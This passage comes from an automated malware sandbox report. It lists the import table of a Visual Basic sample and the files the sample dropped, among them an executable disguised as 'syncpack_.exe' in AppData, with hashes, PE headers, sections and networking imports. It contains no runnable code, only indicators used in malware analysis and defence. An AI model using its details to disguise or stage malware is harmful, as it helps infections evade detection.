| __vbaI2I4 | 0x0 | 0x40109c | 0xd868 | 0xd868 |
| DllFunctionCall | 0x0 | 0x4010a0 | 0xd86c | 0xd86c |
| __vbaRedimPreserve | 0x0 | 0x4010a4 | 0xd870 | 0xd870 |
| _adj_fpatan | 0x0 | 0x4010a8 | 0xd874 | 0xd874 |
| __vbaRedim | 0x0 | 0x4010ac | 0xd878 | 0xd878 |
| EVENT_SINK_Release | 0x0 | 0x4010b0 | 0xd87c | 0xd87c |
| __vbaUI1I2 | 0x0 | 0x4010b4 | 0xd880 | 0xd880 |
| _CIsqrt | 0x0 | 0x4010b8 | 0xd884 | 0xd884 |
| EVENT_SINK_QueryInterface | 0x0 | 0x4010bc | 0xd888 | 0xd888 |
| __vbaUI1I4 | 0x0 | 0x4010c0 | 0xd88c | 0xd88c |
| __vbaExceptHandler | 0x0 | 0x4010c4 | 0xd890 | 0xd890 |
| _adj_fprem | 0x0 | 0x4010c8 | 0xd894 | 0xd894 |
| _adj_fdivr_m64 | 0x0 | 0x4010cc | 0xd898 | 0xd898 |
| (by ordinal) | 0x260 | 0x4010d0 | 0xd89c | 0xd89c |
| __vbaFPException | 0x0 | 0x4010d4 | 0xd8a0 | 0xd8a0 |
| __vbaInStrVar | 0x0 | 0x4010d8 | 0xd8a4 | 0xd8a4 |
| (by ordinal) | 0x2cd | 0x4010dc | 0xd8a8 | 0xd8a8 |
| __vbaStrVarVal | 0x0 | 0x4010e0 | 0xd8ac | 0xd8ac |
| __vbaUbound | 0x0 | 0x4010e4 | 0xd8b0 | 0xd8b0 |
| __vbaVarCat | 0x0 | 0x4010e8 | 0xd8b4 | 0xd8b4 |
| (by ordinal) | 0x217 | 0x4010ec | 0xd8b8 | 0xd8b8 |
| __vbaI2Var | 0x0 | 0x4010f0 | 0xd8bc | 0xd8bc |
| (by ordinal) | 0x219 | 0x4010f4 | 0xd8c0 | 0xd8c0 |
| _CIlog | 0x0 | 0x4010f8 | 0xd8c4 | 0xd8c4 |
| __vbaErrorOverflow | 0x0 | 0x4010fc | 0xd8c8 | 0xd8c8 |
| __vbaVar2Vec | 0x0 | 0x401100 | 0xd8cc | 0xd8cc |
| __vbaNew2 | 0x0 | 0x401104 | 0xd8d0 | 0xd8d0 |
| _adj_fdiv_m32i | 0x0 | 0x401108 | 0xd8d4 | 0xd8d4 |
| _adj_fdivr_m32i | 0x0 | 0x40110c | 0xd8d8 | 0xd8d8 |
| __vbaStrCopy | 0x0 | 0x401110 | 0xd8dc | 0xd8dc |
| __vbaI4Str | 0x0 | 0x401114 | 0xd8e0 | 0xd8e0 |
| __vbaFreeStrList | 0x0 | 0x401118 | 0xd8e4 | 0xd8e4 |
| _adj_fdivr_m32 | 0x0 | 0x40111c | 0xd8e8 | 0xd8e8 |
| __vbaPowerR8 | 0x0 | 0x401120 | 0xd8ec | 0xd8ec |
| _adj_fdiv_r | 0x0 | 0x401124 | 0xd8f0 | 0xd8f0 |
| (by ordinal) | 0x2ad | 0x401128 | 0xd8f4 | 0xd8f4 |
| (by ordinal) | 0x64 | 0x40112c | 0xd8f8 | 0xd8f8 |
| __vbaI4Var | 0x0 | 0x401130 | 0xd8fc | 0xd8fc |
| __vbaVarAdd | 0x0 | 0x401134 | 0xd900 | 0xd900 |
| __vbaAryLock | 0x0 | 0x401138 | 0xd904 | 0xd904 |
| __vbaVarDup | 0x0 | 0x40113c | 0xd908 | 0xd908 |
| __vbaFpI2 | 0x0 | 0x401140 | 0xd90c | 0xd90c |
| __vbaFpI4 | 0x0 | 0x401144 | 0xd910 | 0xd910 |
| _CIatan | 0x0 | 0x401148 | 0xd914 | 0xd914 |
| __vbaStrMove | 0x0 | 0x40114c | 0xd918 | 0xd918 |
| __vbaUI1Str | 0x0 | 0x401150 | 0xd91c | 0xd91c |
| __vbaAryCopy | 0x0 | 0x401154 | 0xd920 | 0xd920 |
| __vbaR8IntI4 | 0x0 | 0x401158 | 0xd924 | 0xd924 |
| _allmul | 0x0 | 0x40115c | 0xd928 | 0xd928 |
| _CItan | 0x0 | 0x401160 | 0xd92c | 0xd92c |
| __vbaAryUnlock | 0x0 | 0x401164 | 0xd930 | 0xd930 |
| __vbaFPInt | 0x0 | 0x401168 | 0xd934 | 0xd934 |
| __vbaVarForNext | 0x0 | 0x40116c | 0xd938 | 0xd938 |
| _CIexp | 0x0 | 0x401170 | 0xd93c | 0xd93c |
| __vbaFreeStr | 0x0 | 0x401174 | 0xd940 | 0xd940 |
| __vbaFreeObj | 0x0 | 0x401178 | 0xd944 | 0xd944 |
Exports (1)
»
| Api name | EAT Address | Ordinal |
|---|---|---|
| cmdInsertSort_Click | 0x40c720 | 0x1 |
Icons (5)
»
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp
»
| File Properties | |
|---|---|
| Names | c:\users\kft6utqw\appdata\local\temp\d3d3.tmp (Created File) |
| Size | 0.05 KB |
| Hash Values |
MD5: f82e7a2f3860bbe2226620e0a569d5bb
SHA1: 4e7c4099d0597bc28f4ffea6a00d6c44341ee04c SHA256: b1d64604932a6676690fda7132f96766bd05ed9118247d8ab4c642e9ddbf95f2 |
| Actions |
...
|
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
»
| File Properties | |
|---|---|
| Names | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe (Created File) |
| Size | 77.50 KB |
| Hash Values |
MD5: 3290d6946b5e30e70414990574883ddb
SHA1: be0144e3235ffde0787e9f1cd34c828ec87d8e19 SHA256: 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663 |
| Actions |
...
|
PE Information
»
| Information | Value |
|---|---|
| Image Base | 0x100000000 |
| Entry Point | 0x10000bdfc |
| Size Of Code | 0xf800 |
| Size Of Initialized Data | 0x4400 |
| Size Of Uninitialized Data | 0x0 |
| Format | x64 |
| Type | Executable |
| Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI |
| Machine Type | IMAGE_FILE_MACHINE_AMD64 |
| Compile Timestamp | 2009-07-14 02:08:46 |
| Compiler/Packer | Unknown |
Sections (5)
»
| Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
|---|---|---|---|---|---|---|
| .text | 0x100001000 | 0xf7fe | 0xf800 | 0x400 | CNT_CODE, MEM_EXECUTE, MEM_READ | 5.98 |
| .data | 0x100011000 | 0xe18 | 0x600 | 0xfc00 | CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE | 2.36 |
| .pdata | 0x100012000 | 0xfa8 | 0x1000 | 0x10200 | CNT_INITIALIZED_DATA, MEM_READ | 4.58 |
| .rsrc | 0x100013000 | 0x1fc8 | 0x2000 | 0x11200 | CNT_INITIALIZED_DATA, MEM_READ | 5.5 |
| .reloc | 0x100015000 | 0x28a | 0x400 | 0x13200 | CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ | 2.9 |
Imports (117)
»
ADVAPI32.dll (9)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| SetServiceStatus | 0x0 | 0x100001000 | 0xfcf8 | 0xf0f8 |
| RegisterServiceCtrlHandlerW | 0x0 | 0x100001008 | 0xfd00 | 0xf100 |
| RegNotifyChangeKeyValue | 0x0 | 0x100001010 | 0xfd08 | 0xf108 |
| RegCloseKey | 0x0 | 0x100001018 | 0xfd10 | 0xf110 |
| RegOpenKeyExW | 0x0 | 0x100001020 | 0xfd18 | 0xf118 |
| StartServiceCtrlDispatcherW | 0x0 | 0x100001028 | 0xfd20 | 0xf120 |
| RegQueryValueExW | 0x0 | 0x100001030 | 0xfd28 | 0xf128 |
| RegEnumKeyExW | 0x0 | 0x100001038 | 0xfd30 | 0xf130 |
| SystemFunction036 | 0x0 | 0x100001040 | 0xfd38 | 0xf138 |
KERNEL32.dll (36)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| CreateEventW | 0x0 | 0x100001088 | 0xfd80 | 0xf180 |
| WaitForMultipleObjects | 0x0 | 0x100001090 | 0xfd88 | 0xf188 |
| Sleep | 0x0 | 0x100001098 | 0xfd90 | 0xf190 |
| HeapSetInformation | 0x0 | 0x1000010a0 | 0xfd98 | 0xf198 |
| WaitForSingleObject | 0x0 | 0x1000010a8 | 0xfda0 | 0xf1a0 |
| SetEvent | 0x0 | 0x1000010b0 | 0xfda8 | 0xf1a8 |
| CreateThread | 0x0 | 0x1000010b8 | 0xfdb0 | 0xf1b0 |
| CreateTimerQueueTimer | 0x0 | 0x1000010c0 | 0xfdb8 | 0xf1b8 |
| DeleteTimerQueueTimer | 0x0 | 0x1000010c8 | 0xfdc0 | 0xf1c0 |
| GetCurrentProcessId | 0x0 | 0x1000010d0 | 0xfdc8 | 0xf1c8 |
| DuplicateHandle | 0x0 | 0x1000010d8 | 0xfdd0 | 0xf1d0 |
| GetCurrentProcess | 0x0 | 0x1000010e0 | 0xfdd8 | 0xf1d8 |
| RaiseException | 0x0 | 0x1000010e8 | 0xfde0 | 0xf1e0 |
| EnterCriticalSection | 0x0 | 0x1000010f0 | 0xfde8 | 0xf1e8 |
| LeaveCriticalSection | 0x0 | 0x1000010f8 | 0xfdf0 | 0xf1f0 |
| WriteFile | 0x0 | 0x100001100 | 0xfdf8 | 0xf1f8 |
| ReadFile | 0x0 | 0x100001108 | 0xfe00 | 0xf200 |
| BindIoCompletionCallback | 0x0 | 0x100001110 | 0xfe08 | 0xf208 |
| CloseHandle | 0x0 | 0x100001118 | 0xfe10 | 0xf210 |
| GetProcessHeap | 0x0 | 0x100001120 | 0xfe18 | 0xf218 |
| HeapAlloc | 0x0 | 0x100001128 | 0xfe20 | 0xf220 |
| UnhandledExceptionFilter | 0x0 | 0x100001130 | 0xfe28 | 0xf228 |
| TerminateProcess | 0x0 | 0x100001138 | 0xfe30 | 0xf230 |
| GetSystemTimeAsFileTime | 0x0 | 0x100001140 | 0xfe38 | 0xf238 |
| GetCurrentThreadId | 0x0 | 0x100001148 | 0xfe40 | 0xf240 |
| GetTickCount | 0x0 | 0x100001150 | 0xfe48 | 0xf248 |
| QueryPerformanceCounter | 0x0 | 0x100001158 | 0xfe50 | 0xf250 |
| GetModuleHandleW | 0x0 | 0x100001160 | 0xfe58 | 0xf258 |
| SetUnhandledExceptionFilter | 0x0 | 0x100001168 | 0xfe60 | 0xf260 |
| GetStartupInfoW | 0x0 | 0x100001170 | 0xfe68 | 0xf268 |
| InitializeCriticalSection | 0x0 | 0x100001178 | 0xfe70 | 0xf270 |
| DeleteCriticalSection | 0x0 | 0x100001180 | 0xfe78 | 0xf278 |
| DeleteTimerQueueEx | 0x0 | 0x100001188 | 0xfe80 | 0xf280 |
| CreateTimerQueue | 0x0 | 0x100001190 | 0xfe88 | 0xf288 |
| GetLastError | 0x0 | 0x100001198 | 0xfe90 | 0xf290 |
| HeapFree | 0x0 | 0x1000011a0 | 0xfe98 | 0xf298 |
msvcrt.dll (38)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| _unlock | 0x0 | 0x100001260 | 0xff58 | 0xf358 |
| _lock | 0x0 | 0x100001268 | 0xff60 | 0xf360 |
| ?terminate@@YAXXZ | 0x0 | 0x100001270 | 0xff68 | 0xf368 |
| memset | 0x0 | 0x100001278 | 0xff70 | 0xf370 |
| _onexit | 0x0 | 0x100001280 | 0xff78 | 0xf378 |
| ??1type_info@@UEAA@XZ | 0x0 | 0x100001288 | 0xff80 | 0xf380 |
| __dllonexit | 0x0 | 0x100001290 | 0xff88 | 0xf388 |
| __set_app_type | 0x0 | 0x100001298 | 0xff90 | 0xf390 |
| _fmode | 0x0 | 0x1000012a0 | 0xff98 | 0xf398 |
| __setusermatherr | 0x0 | 0x1000012a8 | 0xffa0 | 0xf3a0 |
| _amsg_exit | 0x0 | 0x1000012b0 | 0xffa8 | 0xf3a8 |
| _initterm | 0x0 | 0x1000012b8 | 0xffb0 | 0xf3b0 |
| _wcmdln | 0x0 | 0x1000012c0 | 0xffb8 | 0xf3b8 |
| exit | 0x0 | 0x1000012c8 | 0xffc0 | 0xf3c0 |
| _cexit | 0x0 | 0x1000012d0 | 0xffc8 | 0xf3c8 |
| _exit | 0x0 | 0x1000012d8 | 0xffd0 | 0xf3d0 |
| _XcptFilter | 0x0 | 0x1000012e0 | 0xffd8 | 0xf3d8 |
| __C_specific_handler | 0x0 | 0x1000012e8 | 0xffe0 | 0xf3e0 |
| __wgetmainargs | 0x0 | 0x1000012f0 | 0xffe8 | 0xf3e8 |
| __CxxFrameHandler3 | 0x0 | 0x1000012f8 | 0xfff0 | 0xf3f0 |
| _callnewh | 0x0 | 0x100001300 | 0xfff8 | 0xf3f8 |
| malloc | 0x0 | 0x100001308 | 0x10000 | 0xf400 |
| _CxxThrowException | 0x0 | 0x100001310 | 0x10008 | 0xf408 |
| ??0exception@@QEAA@AEBQEBDH@Z | 0x0 | 0x100001318 | 0x10010 | 0xf410 |
| memmove | 0x0 | 0x100001320 | 0x10018 | 0xf418 |
| realloc | 0x0 | 0x100001328 | 0x10020 | 0xf420 |
| ??0exception@@QEAA@XZ | 0x0 | 0x100001330 | 0x10028 | 0xf428 |
| memmove_s | 0x0 | 0x100001338 | 0x10030 | 0xf430 |
| memcpy_s | 0x0 | 0x100001340 | 0x10038 | 0xf438 |
| _wcsicmp | 0x0 | 0x100001348 | 0x10040 | 0xf440 |
| free | 0x0 | 0x100001350 | 0x10048 | 0xf448 |
| ?what@exception@@UEBAPEBDXZ | 0x0 | 0x100001358 | 0x10050 | 0xf450 |
| ??0exception@@QEAA@AEBV0@@Z | 0x0 | 0x100001360 | 0x10058 | 0xf458 |
| isdigit | 0x0 | 0x100001368 | 0x10060 | 0xf460 |
| ??1exception@@UEAA@XZ | 0x0 | 0x100001370 | 0x10068 | 0xf468 |
| ??0exception@@QEAA@AEBQEBD@Z | 0x0 | 0x100001378 | 0x10070 | 0xf470 |
| _commode | 0x0 | 0x100001380 | 0x10078 | 0xf478 |
| memcpy | 0x0 | 0x100001388 | 0x10080 | 0xf480 |
ATL.DLL (6)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| (by ordinal) | 0x11 | 0x100001050 | 0xfd48 | 0xf148 |
| (by ordinal) | 0x10 | 0x100001058 | 0xfd50 | 0xf150 |
| (by ordinal) | 0x20 | 0x100001060 | 0xfd58 | 0xf158 |
| (by ordinal) | 0x17 | 0x100001068 | 0xfd60 | 0xf160 |
| (by ordinal) | 0x14 | 0x100001070 | 0xfd68 | 0xf168 |
| (by ordinal) | 0x15 | 0x100001078 | 0xfd70 | 0xf170 |
WS2_32.dll (15)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| htons | 0x9 | 0x1000011c8 | 0xfec0 | 0xf2c0 |
| getpeername | 0x5 | 0x1000011d0 | 0xfec8 | 0xf2c8 |
| getsockname | 0x6 | 0x1000011d8 | 0xfed0 | 0xf2d0 |
| bind | 0x2 | 0x1000011e0 | 0xfed8 | 0xf2d8 |
| WSASocketW | 0x0 | 0x1000011e8 | 0xfee0 | 0xf2e0 |
| socket | 0x17 | 0x1000011f0 | 0xfee8 | 0xf2e8 |
| closesocket | 0x3 | 0x1000011f8 | 0xfef0 | 0xf2f0 |
| ntohs | 0xf | 0x100001200 | 0xfef8 | 0xf2f8 |
| WSAIoctl | 0x0 | 0x100001208 | 0xff00 | 0xf300 |
| listen | 0xd | 0x100001210 | 0xff08 | 0xf308 |
| htonl | 0x8 | 0x100001218 | 0xff10 | 0xf310 |
| setsockopt | 0x15 | 0x100001220 | 0xff18 | 0xf318 |
| WSAStartup | 0x73 | 0x100001228 | 0xff20 | 0xf320 |
| WSACleanup | 0x74 | 0x100001230 | 0xff28 | 0xf328 |
| WSAGetLastError | 0x6f | 0x100001238 | 0xff30 | 0xf330 |
ole32.dll (6)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| CoTaskMemFree | 0x0 | 0x1000013b8 | 0x100b0 | 0xf4b0 |
| CoTaskMemAlloc | 0x0 | 0x1000013c0 | 0x100b8 | 0xf4b8 |
| CoUninitialize | 0x0 | 0x1000013c8 | 0x100c0 | 0xf4c0 |
| CoInitializeEx | 0x0 | 0x1000013d0 | 0x100c8 | 0xf4c8 |
| CLSIDFromString | 0x0 | 0x1000013d8 | 0x100d0 | 0xf4d0 |
| CoCreateInstance | 0x0 | 0x1000013e0 | 0x100d8 | 0xf4d8 |
OLEAUT32.dll (2)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| SysAllocString | 0x2 | 0x1000011b0 | 0xfea8 | 0xf2a8 |
| SysFreeString | 0x6 | 0x1000011b8 | 0xfeb0 | 0xf2b0 |
ntdll.dll (3)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| RtlCaptureContext | 0x0 | 0x100001398 | 0x10090 | 0xf490 |
| RtlLookupFunctionEntry | 0x0 | 0x1000013a0 | 0x10098 | 0xf498 |
| RtlVirtualUnwind | 0x0 | 0x1000013a8 | 0x100a0 | 0xf4a0 |
WSOCK32.dll (2)
»
| API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
|---|---|---|---|---|
| ord1141 | 0x475 | 0x100001248 | 0xff40 | 0xf340 |
| ord1142 | 0x476 | 0x100001250 | 0xff48 | 0xf348 |
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp
»
| File Properties | |
|---|---|
| Names | c:\users\kft6utqw\appdata\local\temp\d3a3.tmp (Created File) |
| Size | 0.09 KB |
| Hash Values |
MD5: 373017c133fb80b96aaec222ce291d38
SHA1: 08db0aebdfd799ce29aa3086abfac8dfccc6816e SHA256: 5571ede5f2c75cadcf4f20a7388db611cff807b47b7a564f853f2cac8af2eb04 |
| Actions |
...
|
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp
»
| File Properties | |
|---|---|
| Names | c:\users\kft6utqw\appdata\local\temp\d3d4.tmp (Created File) |
| Size | 0.11 KB |
| Hash Values |
MD5: 36427ecb2a0faf13af3047c51b29f9c5
SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
| Actions |
...
|
c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp, ...
»
| File Properties | |
|---|---|
| Names |
c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp (Created File)
c:\users\kft6utqw\appdata\local\temp\~df0894a2d8a2a8bfc2.tmp (Created File) |
| Size | 16.00 KB |
| Hash Values |
MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1 SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe |
| Actions |
...
|
